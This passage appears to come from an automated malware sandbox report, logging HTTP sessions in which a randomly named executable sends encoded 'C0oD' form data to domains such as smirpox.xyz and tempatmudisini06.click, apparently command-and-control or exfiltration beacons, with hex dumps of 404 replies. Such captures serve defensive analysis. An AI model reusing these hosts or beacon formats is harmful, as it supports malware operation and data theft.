                                                                    Data Raw: 43 30 6f 44 3d 32 36 52 34 38 58 71 6c 73 56 52 34 58 6e 39 51 6a 76 61 34 63 6a 61 2f 36 69 72 61 32 31 61 65 32 2f 30 57 30 74 4c 6e 6b 71 77 78 67 71 51 45 62 65 56 32 30 7a 36 6f 4d 4e 37 74 47 59 7a 55 6f 42 2f 2f 71 50 6f 68 78 52 66 6c 4c 5a 31 6f 68 6c 57 45 54 6b 31 35 6a 67 41 51 57 63 48 64 52 62 67 69 59 2b 5a 49 6d 41 64 30 54 70 54 67 52 74 69 54 6f 4c 65 77 5a 78 48 37 53 52 64 32 31 31 6e 4e 57 72 64 53 6c 32 67 72 79 50 59 41 48 6a 53 73 48 7a 39 58 56 6b 38 51 42 4d 72 50 4a 70 41 70 54 54 36 62 36 33 70 31 2b 2b 6b 31 32 2b 4a 38 39 49 32 73 73 53 76 7a 78 66 6c 38 55 36 74 37 73 57 34 6d 49 4f 79 63 32 68 47 56 77 44 43 76 5a 71 78 2f 79 62 34 43 4e 5a 30 72 5a 70 4a 31 34 77 48 44 43 45 76 42 52 6f 72 43 41 4b 75 4b 69 58 4e 46 35 6d 77 45 65 6c 6d 53 66 61 67 33 4a 51 2f 78 45 45 4e 68 7a 68 70 63 2b 32 44 42 69 49 43 56 66 78 47 31 36 43 56 54 4d 53 56 4f 64 32 4b 67 68 6f 4c 42 45 4f 6d 61 50 70 4d 56 45 45 79 53 61 62 37 6b 33 70 68 2f 32 53 56 61 53 44 38 79 6d 30 37 67 55 [TRUNCATED]
                                                                    Data Ascii: C0oD=26R48XqlsVR4Xn9Qjva4cja/6ira21ae2/0W0tLnkqwxgqQEbeV20z6oMN7tGYzUoB//qPohxRflLZ1ohlWETk15jgAQWcHdRbgiY+ZImAd0TpTgRtiToLewZxH7SRd211nNWrdSl2gryPYAHjSsHz9XVk8QBMrPJpApTT6b63p1++k12+J89I2ssSvzxfl8U6t7sW4mIOyc2hGVwDCvZqx/yb4CNZ0rZpJ14wHDCEvBRorCAKuKiXNF5mwEelmSfag3JQ/xEENhzhpc+2DBiICVfxG16CVTMSVOd2KghoLBEOmaPpMVEEySab7k3ph/2SVaSD8ym07gU2VgIYfy7ko+4uXTSvROFPeV7NQqwVWQbl4ywTqULkK5AKYoIMsPGGmUj55xbTsU9EXVqFO3uP1y0yNZgqdYEpE5DeKXQYmAq1+0ecqJ3Qgnvxr/4xWh9d3pPRwkSxAh1ipsNcwYvbXaPl+S1FJceA9dm7X1+s9heped/sofvZHdgEsdwYZ++xVPeTgRKoOJG3gOr1p0ix25ueJWuzDMAvmmSBROGcD7q9Jdf1OeIpwuC/Mh8Z//fsrjF7I5cJQ9PnDZRrjbCfDezQui9PyureqTFLHR1PeWvdt2aJA8aj55/oYBXIFHUselmht21idQ60bD4+da8t7cWmFQ1a7Wj/wBO6ttKwla30oLG5gHrayeJRX+rOiJKGEl75lmhA+SS8kTxlqcZdMtGNDgr351pZ+rvv7dnSqSGO4yJU20lWbQzFREUYOROlhBwq6HM/+R9iBU5uHe2fUkqXHlkL1Qa+9j1lwh7Ud+O7Zml73D0alBxbjj07xIcOXhBmqaQCMF592jxqE/CdKMaY3dnhD2shW7UDMEFFJZp9Tzmk0hkO7Md1rXouflGHHV2JOl3lWXgnWe5D+zpFGkox9BmGFtAarK/a7YxJxajjdxZ3GxPGmtyj9EAc0MFM19yMof7YRcxPD2uKQCrIrgyAMcuT9ohjwqOymr6cax0Lm [TRUNCATED]
                                                                    Nov 12, 2024 18:49:37.660224915 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Tue, 12 Nov 2024 17:49:37 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.450030103.21.221.4804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:39.207734108 CET548OUTGET /kfzf/?C0oD=745Y/jOyjUFFKVt1zrqnMxLflzH3xCS2ztdY3unhpOMZjpxTMolv6jL+LcLzYo7s20rMx9IK4inFAvVSlw+JL0dGgGxHe8jTeLADQYR7lRwUQufrcbnmx6Y=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.tempatmudisini06.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:49:40.204647064 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Tue, 12 Nov 2024 17:49:40 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.450031203.161.46.201804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:45.649389029 CET794OUTPOST /qnzs/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.smirpox.xyz
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.smirpox.xyz
                                                                    Referer: http://www.smirpox.xyz/qnzs/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 4c 7a 4d 6a 45 67 4d 66 78 4c 5a 58 45 64 72 32 57 73 2b 64 48 33 42 46 77 61 62 2b 63 75 45 44 4a 4c 78 61 6d 35 79 44 6d 46 64 33 53 43 6c 50 57 36 6d 4f 55 71 65 35 56 32 61 5a 64 6d 53 69 6b 6d 33 2b 78 48 67 72 35 36 59 59 6f 6d 6e 67 48 33 76 39 33 42 30 44 4d 4f 5a 72 2b 2f 56 38 6b 78 4b 73 64 54 62 68 71 66 4e 50 52 37 4f 65 30 78 63 6f 56 35 53 58 43 48 78 4c 46 48 4d 57 69 57 2f 42 58 52 51 77 63 65 4a 35 48 38 6d 62 49 55 31 4e 74 69 34 42 37 6d 6a 53 75 78 74 44 4f 6a 39 50 51 2f 72 73 73 72 65 35 68 6b 66 75 4a 7a 4d 46 37 30 68 6f 4a 4d 4e 30 4e 73 6a 75 43 51 3d 3d
                                                                    Data Ascii: C0oD=LzMjEgMfxLZXEdr2Ws+dH3BFwab+cuEDJLxam5yDmFd3SClPW6mOUqe5V2aZdmSikm3+xHgr56YYomngH3v93B0DMOZr+/V8kxKsdTbhqfNPR7Oe0xcoV5SXCHxLFHMWiW/BXRQwceJ5H8mbIU1Nti4B7mjSuxtDOj9PQ/rssre5hkfuJzMF70hoJMN0NsjuCQ==
                                                                    Nov 12, 2024 18:49:46.307281971 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:49:46 GMT
                                                                    Server: Apache
                                                                    Content-Length: 38381
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                                                    Nov 12, 2024 18:49:46.307310104 CET1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                                                    Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
                                                                    Nov 12, 2024 18:49:46.307332039 CET1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65
                                                                    Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
                                                                    Nov 12, 2024 18:49:46.307662010 CET1236INData Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                                                                    Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
                                                                    Nov 12, 2024 18:49:46.307815075 CET848INData Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37
                                                                    Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
                                                                    Nov 12, 2024 18:49:46.308185101 CET1236INData Raw: 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72
                                                                    Data Ascii: 2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rota
                                                                    Nov 12, 2024 18:49:46.308198929 CET1236INData Raw: 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 39 2e 32 22 20 63 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34
                                                                    Data Ascii: "/> <circle cx="609.2" cy="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"
                                                                    Nov 12, 2024 18:49:46.308221102 CET1236INData Raw: 22 20 63 79 3d 22 37 33 30 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 30 2e 36 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c
                                                                    Data Ascii: " cy="730.7" r="3.7" transform="translate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4"
                                                                    Nov 12, 2024 18:49:46.308238029 CET636INData Raw: 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 30 2e 36 20 33 31 39 2e 36 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c
                                                                    Data Ascii: rm="translate(-240.6 319.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="526.3" cy="682.4" r="3.7" transform="translate(-253.2 314.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="522.2" cy="697.3" r="3.7" transfor
                                                                    Nov 12, 2024 18:49:46.308844090 CET1236INData Raw: 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 31 2e 31 22 20 63 79 3d 22 36 39 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61
                                                                    Data Ascii: -27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-256.4 322.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-
                                                                    Nov 12, 2024 18:49:46.313348055 CET1236INData Raw: 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 32 22 20 63 79 3d 22 37 34 38 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 34 2e 37 20 33 31 35 2e 35 29 20 72 6f 74 61 74 65
                                                                    Data Ascii: <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="515.2" cy="730.5" r="3.7" transform="translate(-276.3 315.1) rotate(-27.1)" style="fill: #ffe029"/>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.450032203.161.46.201804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:48.194948912 CET814OUTPOST /qnzs/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.smirpox.xyz
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.smirpox.xyz
                                                                    Referer: http://www.smirpox.xyz/qnzs/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 4c 7a 4d 6a 45 67 4d 66 78 4c 5a 58 57 74 62 32 46 64 2b 64 46 58 42 47 70 36 62 2b 54 4f 45 59 4a 4c 31 61 6d 34 47 70 6d 78 78 33 53 6a 56 50 58 2f 4b 4f 56 71 65 35 4d 47 61 63 53 47 53 58 6b 6d 37 41 78 46 45 72 35 2b 77 59 6f 6e 33 67 47 45 33 2b 78 42 30 42 44 75 5a 74 78 66 56 38 6b 78 4b 73 64 54 50 62 71 66 56 50 52 49 57 65 30 51 63 72 66 5a 53 55 42 48 78 4c 50 6e 4d 61 69 57 2f 76 58 55 35 62 63 59 4e 35 48 2b 2b 62 4c 46 31 4b 6a 69 34 62 2f 6d 6a 4e 68 6b 31 48 49 7a 63 79 53 38 76 75 6c 49 6d 50 67 69 53 30 59 43 74 53 70 30 46 62 55 4c 45 41 41 76 65 6e 5a 57 73 64 6c 61 64 50 63 52 47 79 68 51 78 33 67 75 77 4c 79 31 55 3d
                                                                    Data Ascii: C0oD=LzMjEgMfxLZXWtb2Fd+dFXBGp6b+TOEYJL1am4Gpmxx3SjVPX/KOVqe5MGacSGSXkm7AxFEr5+wYon3gGE3+xB0BDuZtxfV8kxKsdTPbqfVPRIWe0QcrfZSUBHxLPnMaiW/vXU5bcYN5H++bLF1Kji4b/mjNhk1HIzcyS8vulImPgiS0YCtSp0FbULEAAvenZWsdladPcRGyhQx3guwLy1U=
                                                                    Nov 12, 2024 18:49:48.868078947 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:49:48 GMT
                                                                    Server: Apache
                                                                    Content-Length: 38381
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                                                    Nov 12, 2024 18:49:48.868172884 CET1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                                                    Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
                                                                    Nov 12, 2024 18:49:48.868185043 CET1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65
                                                                    Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
                                                                    Nov 12, 2024 18:49:48.868633032 CET1236INData Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
